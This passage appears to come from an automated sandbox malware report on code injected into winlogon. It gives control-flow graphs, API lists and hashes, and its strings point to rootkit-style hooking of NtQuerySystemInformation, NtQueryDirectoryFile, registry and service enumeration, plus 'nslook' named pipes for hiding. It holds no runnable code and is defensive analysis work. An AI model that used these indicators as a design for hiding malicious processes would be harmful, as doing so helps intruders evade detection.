1afddd063f1-1afddd06404 call 1afddd054a0 227->229 230 1afddd06433-1afddd0643b 227->230 244 1afddd06406 229->244 245 1afddd06408-1afddd06431 229->245 233 1afddd06447-1afddd06456 230->233 234 1afddd0643d-1afddd06445 230->234 236 1afddd0645f 233->236 237 1afddd06458 233->237 234->233 235 1afddd06464-1afddd06471 234->235 242 1afddd06473 235->242 243 1afddd06474-1afddd064c9 call 1afddd09480 235->243 236->235 237->236 248 1afddd063e0 238->248 249 1afddd063e2 238->249 239->227 242->243 251 1afddd064d8-1afddd06571 call 1afddd05420 call 1afddd05380 VirtualProtect 243->251 252 1afddd064cb-1afddd064d3 243->252 244->230 245->227 248->227 249->225 257 1afddd06581-1afddd065e1 251->257 258 1afddd06573-1afddd06578 GetLastError 251->258 257->181 258->257
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 77b0e61026dcb1cbe9ffaeb6768d5842275e70ce13d5836d784ec2967e2859dc
                            • Instruction ID: fa25290cde449c2035e164aaea8dd913c4daef40ef9751952fc41bf151f0e6d4
                            • Opcode Fuzzy Hash: 77b0e61026dcb1cbe9ffaeb6768d5842275e70ce13d5836d784ec2967e2859dc
                            • Instruction Fuzzy Hash: 2702033221AB8086DB61CB95F4557AAB7B4F3C5784F104029EB8E87BA9DF7CC449DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD048F0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Virtual$AllocQuery
                            • String ID:
                            • API String ID: 31662377-0
                            • Opcode ID: 1d8c233d6227d2e299d15bdeac6b71acf21758d515661483862986c49184b7ec
                            • Instruction ID: a9395169232f802f892956596497334a0496ede1b8f251cddf5b8ebc68a6df38
                            • Opcode Fuzzy Hash: 1d8c233d6227d2e299d15bdeac6b71acf21758d515661483862986c49184b7ec
                            • Instruction Fuzzy Hash: 2731F232717A8181EE72DAD5F0507AE6298F3C978CF10053DE5CD46BD8DB6CC54A9B05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD05D00 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                            • String ID:
                            • API String ID: 3733156554-0
                            • Opcode ID: 2e14d6d64783aa5e808863a58a0602ed5772b49a50541b1fc1cd05cb292e8779
                            • Instruction ID: 6b91a2006ce2e2279d3f1458f23f4396ab72add255b911aa9453f53521d80637
                            • Opcode Fuzzy Hash: 2e14d6d64783aa5e808863a58a0602ed5772b49a50541b1fc1cd05cb292e8779
                            • Instruction Fuzzy Hash: DBF03636317B4480DA31DB81F04479A67A4E3C9BD8F14012AF98D03BA9CA3CC29A9B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDCD35D0 Relevance: 3.2, APIs: 2, Instructions: 216memorylibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 288 1afddcd35d0-1afddcd3632 call 1afddcd34b0 * 4 297 1afddcd3638-1afddcd363b 288->297 298 1afddcd38d2-1afddcd38e6 288->298 297->298 299 1afddcd3641-1afddcd3644 297->299 299->298 300 1afddcd364a-1afddcd364d 299->300 300->298 301 1afddcd3653-1afddcd3672 VirtualAlloc 300->301 301->298 302 1afddcd3678-1afddcd3681 301->302 303 1afddcd3683-1afddcd3689 302->303 304 1afddcd36a1-1afddcd36b5 302->304 305 1afddcd3690-1afddcd369f 303->305 306 1afddcd36b7 304->306 307 1afddcd370f-1afddcd3716 304->307 305->304 305->305 310 1afddcd36c0-1afddcd36df 306->310 308 1afddcd37cc-1afddcd37d4 307->308 309 1afddcd371c-1afddcd3730 307->309 311 1afddcd389e-1afddcd38ce 308->311 312 1afddcd37da-1afddcd37f1 308->312 313 1afddcd37c7 309->313 314 1afddcd3736-1afddcd373b 309->314 315 1afddcd3704-1afddcd370d 310->315 316 1afddcd36e1-1afddcd36e7 310->316 311->298 312->311 318 1afddcd37f7 312->318 313->308 319 1afddcd3740-1afddcd374e LoadLibraryA 314->319 315->307 315->310 317 1afddcd36f0-1afddcd3702 316->317 317->315 317->317 321 1afddcd3800-1afddcd3815 318->321 322 1afddcd3750-1afddcd3760 319->322 323 1afddcd37af-1afddcd37b8 319->323 324 1afddcd388d-1afddcd3898 321->324 325 1afddcd3817 321->325 322->323 326 1afddcd3762-1afddcd3768 322->326 323->319 327 1afddcd37ba-1afddcd37c2 323->327 324->311 324->321 328 1afddcd3820-1afddcd3831 325->328 329 1afddcd378e-1afddcd3798 326->329 330 1afddcd376a-1afddcd378c 326->330 327->313 331 1afddcd383e-1afddcd3842 328->331 332 1afddcd3833-1afddcd383c 328->332 333 1afddcd379e-1afddcd37ad 329->333 330->333 335 1afddcd3844-1afddcd384d 331->335 336 1afddcd384f-1afddcd3853 331->336 334 1afddcd387a-1afddcd388b 332->334 333->323 333->326 334->324 334->328 335->334 337 1afddcd386a-1afddcd386e 336->337 338 1afddcd3855-1afddcd3868 336->338 337->334 339 1afddcd3870-1afddcd3875 337->339 338->334 339->334
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: AllocLibraryLoadVirtual
                            • String ID:
                            • API String ID: 3550616410-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 29ca8924484b3012b58c2a232780904c957ce46a14694de08bb14ef3dc513fb4
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: 528100B270369087DB568FD1DC507EA77A5FB86B80F158239DE89473C4EA38D80AC701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD01ED0 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: 72449b2edef49a5f5eba09553d00170a91160030c7628b33c349c93c22a9b05e
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 3EE0927074760280FE93ABE6AC453FD16996B8A7CCF14003CA949877EAED28805F7203
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 000001AFDDD01F20 Relevance: 57.9, APIs: 21, Strings: 12, Instructions: 167libraryloaderthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 369 1afddd01f20-1afddd01f2b 370 1afddd01f31-1afddd01f62 call 1afddd069c0 GetCurrentThread call 1afddd06ee0 GetModuleHandleA 369->370 371 1afddd02255-1afddd02259 369->371 376 1afddd01f64-1afddd01f7e call 1afddd14040 370->376 377 1afddd01f95 370->377 379 1afddd01f9c-1afddd01fac GetModuleHandleA 376->379 384 1afddd01f80-1afddd01f93 call 1afddd05fa0 376->384 377->379 381 1afddd01fdf 379->381 382 1afddd01fae-1afddd01fc8 call 1afddd14040 379->382 383 1afddd01fe6-1afddd01ff6 GetModuleHandleA 381->383 382->383 393 1afddd01fca-1afddd01fdd call 1afddd05fa0 382->393 386 1afddd01ff8-1afddd02012 call 1afddd14040 383->386 387 1afddd02029 383->387 384->379 392 1afddd02030-1afddd02040 GetModuleHandleA 386->392 399 1afddd02014-1afddd02027 call 1afddd05fa0 386->399 387->392 395 1afddd02042-1afddd0205c call 1afddd14040 392->395 396 1afddd02073 392->396 393->383 398 1afddd0207a-1afddd0208a GetModuleHandleA 395->398 409 1afddd0205e-1afddd02071 call 1afddd05fa0 395->409 396->398 402 1afddd0208c-1afddd020a6 call 1afddd14040 398->402 403 1afddd020bd 398->403 399->392 408 1afddd020c4-1afddd020d4 GetModuleHandleA 402->408 415 1afddd020a8-1afddd020bb call 1afddd05fa0 402->415 403->408 411 1afddd020d6-1afddd020f0 call 1afddd14040 408->411 412 1afddd02107 408->412 409->398 414 1afddd0210e-1afddd0211e GetModuleHandleA 411->414 425 1afddd020f2-1afddd02105 call 1afddd05fa0 411->425 412->414 418 1afddd02120-1afddd0213a call 1afddd14040 414->418 419 1afddd02151 414->419 415->408 424 1afddd02158-1afddd02168 GetModuleHandleA 418->424 431 1afddd0213c-1afddd0214f call 1afddd05fa0 418->431 419->424 427 1afddd0216a-1afddd02184 call 1afddd14040 424->427 428 1afddd0219b 424->428 425->414 430 1afddd021a2-1afddd021b2 GetModuleHandleA 427->430 441 1afddd02186-1afddd02199 call 1afddd05fa0 427->441 428->430 434 1afddd021b4-1afddd021ce call 1afddd14040 430->434 435 1afddd021e5 430->435 431->424 440 1afddd021ec-1afddd021fc GetModuleHandleA 434->440 447 1afddd021d0-1afddd021e3 call 1afddd05fa0 434->447 435->440 443 1afddd0223b 440->443 444 1afddd021fe-1afddd02218 call 1afddd14040 440->444 441->430 446 1afddd02242-1afddd0224b 443->446 444->446 455 1afddd0221a-1afddd02236 call 1afddd05fa0 444->455 446->371 450 1afddd06a30-1afddd06a3f call 1afddd06a40 446->450 447->440 455->450
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 1a5438afa96fb31eb2c2d26e916ed9bb00d06edd36a7089945c407a5c1feeb2e
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: BD91A0B5347B0291EE57DBD5EC543E42AA8BB8B749F84403D840A026E8EE38915EE213
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0BEC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: 5ae404829e96b964d4d6b74cf890e1c381ddceb9440aade8a95e75f581d11291
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: B9319F36316F8186DB61CFA5E8403EE37A4F789758F54012AEA8D43B98DF38C14ACB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD11000 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: 661746793f4cd0b617fe7632d71190ed6a4bcbe8dfa628f154cda19715d2a625
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: 3AD1D073706A819AEB02CBE5D4402ED7BB9F74678CF14422ADE8A47BD9DA34C01BC301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD029E0 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 379stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 459 1afddd029e0-1afddd02abc call 1afddd20ca8 462 1afddd02ac2-1afddd02ac6 459->462 463 1afddd02fa8-1afddd02fca call 1afddd083e0 459->463 462->463 465 1afddd02acc-1afddd02ada 462->465 465->463 467 1afddd02ae0-1afddd02b25 call 1afddd09890 * 3 GetFileType 465->467 474 1afddd02b30-1afddd02b4b GetFinalPathNameByHandleW 467->474 475 1afddd02b27-1afddd02b2e 467->475 477 1afddd02b92-1afddd02b96 474->477 478 1afddd02b4d-1afddd02b68 call 1afddd0a610 474->478 476 1afddd02b85-1afddd02b8c lstrcpyW 475->476 476->477 480 1afddd02dfc-1afddd02e11 477->480 481 1afddd02b9c-1afddd02bb6 call 1afddd03b00 477->481 478->477 485 1afddd02b6a-1afddd02b7c lstrlenW 478->485 483 1afddd02e15-1afddd02e1f 480->483 490 1afddd02bd3-1afddd02c0c call 1afddd03b00 lstrcmpiW 481->490 491 1afddd02bb8-1afddd02bcd call 1afddd0a610 481->491 486 1afddd02e21-1afddd02e33 483->486 487 1afddd02e3d-1afddd02e54 call 1afddd03b00 483->487 485->477 492 1afddd02b7e 485->492 486->487 499 1afddd02e73-1afddd02ea8 call 1afddd03b00 lstrcmpiW 487->499 500 1afddd02e56-1afddd02e6d call 1afddd0a610 487->500 502 1afddd02c27-1afddd02c30 PathCombineW 490->502 503 1afddd02c0e-1afddd02c25 lstrcpyW lstrcatW 490->503 491->490 501 1afddd02cb0-1afddd02cf8 call 1afddd20ca8 491->501 492->476 515 1afddd02ec3-1afddd02ecc PathCombineW 499->515 516 1afddd02eaa-1afddd02ec1 lstrcpyW lstrcatW 499->516 500->499 513 1afddd02f4c-1afddd02f4f 500->513 501->463 514 1afddd02cfe-1afddd02d16 call 1afddd03b00 501->514 507 1afddd02c33-1afddd02c3d 502->507 503->507 511 1afddd02c43-1afddd02c4a 507->511 512 1afddd02fa4 507->512 511->512 517 1afddd02c50-1afddd02c55 511->517 512->463 519 1afddd02f71-1afddd02f74 513->519 520 1afddd02f51-1afddd02f6f call 1afddd09480 513->520 531 1afddd02d35-1afddd02d6e call 1afddd03b00 lstrcmpiW 514->531 532 1afddd02d18-1afddd02d2f call 1afddd0a610 514->532 521 1afddd02ecf-1afddd02ed9 515->521 516->521 517->512 522 1afddd02c5b 517->522 528 1afddd02f76-1afddd02f7b 519->528 529 1afddd02f7d-1afddd02f80 519->529 530 1afddd02f31-1afddd02f34 520->530 525 1afddd02f23-1afddd02f2e 521->525 526 1afddd02edb-1afddd02ee2 521->526 527 1afddd02c60-1afddd02c71 522->527 525->530 526->525 534 1afddd02ee4-1afddd02ee9 526->534 535 1afddd02c73-1afddd02c79 lstrcmpiW 527->535 536 1afddd02c7b lstrcmpW 527->536 528->463 529->512 537 1afddd02f82-1afddd02f9b 529->537 530->512 538 1afddd02f36-1afddd02f3e 530->538 551 1afddd02d70-1afddd02d87 lstrcpyW lstrcatW 531->551 552 1afddd02d89-1afddd02d92 PathCombineW 531->552 532->501 532->531 534->525 541 1afddd02eeb 534->541 542 1afddd02c81-1afddd02c8b 535->542 536->542 537->512 538->483 547 1afddd02ef0-1afddd02f01 541->547 543 1afddd02c98-1afddd02ca7 542->543 544 1afddd02c8d-1afddd02c91 542->544 543->501 544->527 550 1afddd02c93 544->550 548 1afddd02f03-1afddd02f09 lstrcmpiW 547->548 549 1afddd02f0b lstrcmpW 547->549 554 1afddd02f11-1afddd02f1b 548->554 549->554 550->512 553 1afddd02d95-1afddd02d9f 551->553 552->553 553->512 555 1afddd02da5-1afddd02dac 553->555 556 1afddd02f43-1afddd02f47 554->556 557 1afddd02f1d-1afddd02f21 554->557 555->512 558 1afddd02db2-1afddd02db7 555->558 556->513 557->525 557->547 558->512 559 1afddd02dbd 558->559 560 1afddd02dc0-1afddd02dd1 559->560 561 1afddd02dd3-1afddd02dd9 lstrcmpiW 560->561 562 1afddd02ddb lstrcmpW 560->562 563 1afddd02de1-1afddd02deb 561->563 562->563 563->543 564 1afddd02df1-1afddd02df5 563->564 564->560 565 1afddd02df7 564->565 565->512
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: 1f806242f89e9e1f980be443ca6f6b4c2c0827ea550975b3dfb393bbedccd0b9
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 22F1817230368186EF268FE6D8407E97BA5F78AB89F444029DA4947BD8DF38C54ED701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD033C0 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 370stringlibraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 566 1afddd033c0-1afddd0343c call 1afddd20ce0 569 1afddd03442-1afddd03448 566->569 570 1afddd03956-1afddd03975 call 1afddd083e0 566->570 569->570 571 1afddd0344e-1afddd03451 569->571 571->570 573 1afddd03457-1afddd0345a 571->573 573->570 575 1afddd03460-1afddd03470 GetModuleHandleA 573->575 576 1afddd03482-1afddd034a1 575->576 577 1afddd03472-1afddd0347c call 1afddd14040 575->577 576->570 580 1afddd034a7-1afddd034c0 call 1afddd0a610 576->580 577->576 580->570 583 1afddd034c6-1afddd034d5 580->583 584 1afddd034db-1afddd034e6 583->584 585 1afddd0394e 583->585 584->585 586 1afddd034ec-1afddd0350c 584->586 585->570 587 1afddd03512-1afddd03519 586->587 588 1afddd0393a-1afddd03946 586->588 589 1afddd03520-1afddd0352f 587->589 588->585 590 1afddd036d0-1afddd036d3 589->590 591 1afddd03535-1afddd03538 589->591 592 1afddd03929-1afddd03934 590->592 593 1afddd036d9-1afddd036dc 590->593 594 1afddd035b9-1afddd035bc 591->594 595 1afddd0353a-1afddd03558 OpenProcess 591->595 592->588 592->589 598 1afddd0375c-1afddd0375f 593->598 599 1afddd036de-1afddd036fb OpenProcess 593->599 596 1afddd03633-1afddd03636 594->596 597 1afddd035be-1afddd035ca 594->597 600 1afddd035b2 595->600 601 1afddd0355a-1afddd03575 K32GetModuleFileNameExW 595->601 606 1afddd03672-1afddd03675 596->606 607 1afddd03638-1afddd0363b 596->607 602 1afddd035f6-1afddd035f9 597->602 603 1afddd035cc-1afddd035e0 597->603 604 1afddd03761-1afddd0376d 598->604 605 1afddd037a3-1afddd037a6 598->605 608 1afddd03755 599->608 609 1afddd036fd-1afddd03718 K32GetModuleFileNameExW 599->609 600->594 610 1afddd03577-1afddd03596 PathFindFileNameW lstrlenW 601->610 611 1afddd035a9-1afddd035ac CloseHandle 601->611 602->596 616 1afddd035fb-1afddd03607 602->616 614 1afddd035e3-1afddd035e9 603->614 604->605 615 1afddd0376f-1afddd03786 604->615 617 1afddd037e2-1afddd037e5 605->617 618 1afddd037a8-1afddd037ab 605->618 612 1afddd03837-1afddd03853 call 1afddd0a610 606->612 613 1afddd0367b-1afddd03684 606->613 607->612 619 1afddd03641-1afddd0364c 607->619 608->598 620 1afddd0371a-1afddd03739 PathFindFileNameW lstrlenW 609->620 621 1afddd0374c-1afddd0374f CloseHandle 609->621 610->611 622 1afddd03598-1afddd035a3 lstrcpyW 610->622 611->600 644 1afddd03922 612->644 645 1afddd03859 612->645 613->612 623 1afddd0368a 613->623 624 1afddd035ef-1afddd035f4 614->624 625 1afddd03860-1afddd0386d 614->625 626 1afddd03790-1afddd03796 615->626 616->596 628 1afddd03609-1afddd0361d 616->628 617->612 630 1afddd037e7-1afddd037f0 617->630 618->612 629 1afddd037b1-1afddd037bc 618->629 619->606 631 1afddd0364e-1afddd0365d 619->631 620->621 632 1afddd0373b-1afddd03746 lstrcpyW 620->632 621->608 622->611 633 1afddd03690-1afddd036a6 623->633 624->602 624->614 637 1afddd03873-1afddd0387a 625->637 638 1afddd0391a-1afddd03920 625->638 626->625 634 1afddd0379c-1afddd037a1 626->634 636 1afddd03620-1afddd03626 628->636 629->617 639 1afddd037be-1afddd037cc 629->639 630->612 640 1afddd037f2-1afddd037f6 630->640 641 1afddd03660-1afddd03666 631->641 632->621 642 1afddd036b0 lstrcmpW 633->642 643 1afddd036a8-1afddd036ae lstrcmpiW 633->643 634->605 634->626 636->625 646 1afddd0362c-1afddd03631 636->646 647 1afddd03889-1afddd0388c 637->647 648 1afddd0387c-1afddd03887 637->648 638->592 649 1afddd037d0-1afddd037d6 639->649 650 1afddd03800-1afddd03816 640->650 641->625 651 1afddd0366c-1afddd03670 641->651 652 1afddd036b6-1afddd036bf 642->652 643->652 644->592 645->625 646->596 646->636 655 1afddd038af-1afddd038b7 647->655 656 1afddd0388e-1afddd03895 647->656 653 1afddd03899-1afddd038aa call 1afddd09480 648->653 649->625 654 1afddd037dc-1afddd037e0 649->654 657 1afddd03820 lstrcmpW 650->657 658 1afddd03818-1afddd0381e lstrcmpiW 650->658 651->606 651->641 652->645 660 1afddd036c5-1afddd036c9 652->660 653->655 654->617 654->649 662 1afddd038ef-1afddd038f2 655->662 663 1afddd038b9-1afddd038ea call 1afddd09480 655->663 656->653 659 1afddd03826-1afddd0382f 657->659 658->659 659->645 665 1afddd03831-1afddd03835 659->665 660->633 668 1afddd036cb 660->668 666 1afddd038f4-1afddd03913 call 1afddd09480 662->666 667 1afddd03918 662->667 663->662 665->612 665->650 666->667 667->638 668->612
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 77b2b06c29c6f4a16f3b8846f1ab743aed207b05d1d4a6ef3ad6c79be8ae19af
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: D8F19C7670768182EE668FD6E4447E973A8F7CAB88F44403ADA49477C4DF38C84AD742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD02630 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 195stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 670 1afddd02630-1afddd026c0 call 1afddd20ce8 673 1afddd026c6-1afddd026ca 670->673 674 1afddd0298d-1afddd029aa call 1afddd083e0 670->674 673->674 676 1afddd026d0-1afddd026de 673->676 676->674 677 1afddd026e4-1afddd0274a call 1afddd09890 * 3 GetFileType 676->677 685 1afddd02755-1afddd02771 GetFinalPathNameByHandleW 677->685 686 1afddd0274c-1afddd02753 677->686 688 1afddd02773-1afddd0278f call 1afddd0a610 685->688 689 1afddd027b9-1afddd027bd 685->689 687 1afddd027ae-1afddd027b3 lstrcpyW 686->687 687->689 688->689 696 1afddd02791-1afddd027a4 lstrlenW 688->696 690 1afddd027c5-1afddd027d0 689->690 692 1afddd027d2-1afddd027eb 690->692 693 1afddd027ed 690->693 695 1afddd027ef-1afddd02805 call 1afddd03b00 692->695 693->695 701 1afddd02824-1afddd0285b call 1afddd03b00 lstrcmpiW 695->701 702 1afddd02807-1afddd0281e call 1afddd0a610 695->702 696->689 698 1afddd027a6 696->698 698->687 708 1afddd0285d-1afddd0287c lstrcpyW lstrcatW 701->708 709 1afddd0287e-1afddd02887 PathCombineW 701->709 702->701 707 1afddd0291a-1afddd0291c 702->707 711 1afddd02939-1afddd0293c 707->711 712 1afddd0291e-1afddd02937 call 1afddd09480 707->712 710 1afddd0288a-1afddd02894 708->710 709->710 713 1afddd02896-1afddd0289d 710->713 714 1afddd028e8-1afddd028fa 710->714 716 1afddd02945-1afddd02949 711->716 717 1afddd0293e-1afddd02943 711->717 719 1afddd028fd-1afddd028ff 712->719 713->714 722 1afddd0289f-1afddd028a3 713->722 714->719 720 1afddd02969 716->720 721 1afddd0294b-1afddd0295d 716->721 718 1afddd0296d-1afddd02985 717->718 718->674 719->720 724 1afddd02901 719->724 720->718 721->720 722->714 725 1afddd028a5 722->725 724->690 726 1afddd028b0-1afddd028c7 725->726 727 1afddd028d1 lstrcmpW 726->727 728 1afddd028c9-1afddd028cf lstrcmpiW 726->728 729 1afddd028d7-1afddd028e0 727->729 728->729 730 1afddd028e2-1afddd028e6 729->730 731 1afddd02906-1afddd02912 729->731 730->714 730->726 731->707
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 875cf54bdec8b43193d1008bf06815df52a67b0cd42473c4cffd71f8ed247fcf
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: DF91513630768181EF629FD1E4447EE6BA4F7C6B89F444029DA8943AD9DF38C54EDB02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD024F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 76filethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 9f992d225a09bc82c20bc3a95380d94d57120195c82c119c5f604f447a4360d2
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 7631303630764185EA218BD6F45469A67A8F78AB99F4401399E5D03B98DF3CC54E8B01
                            Uniqueness

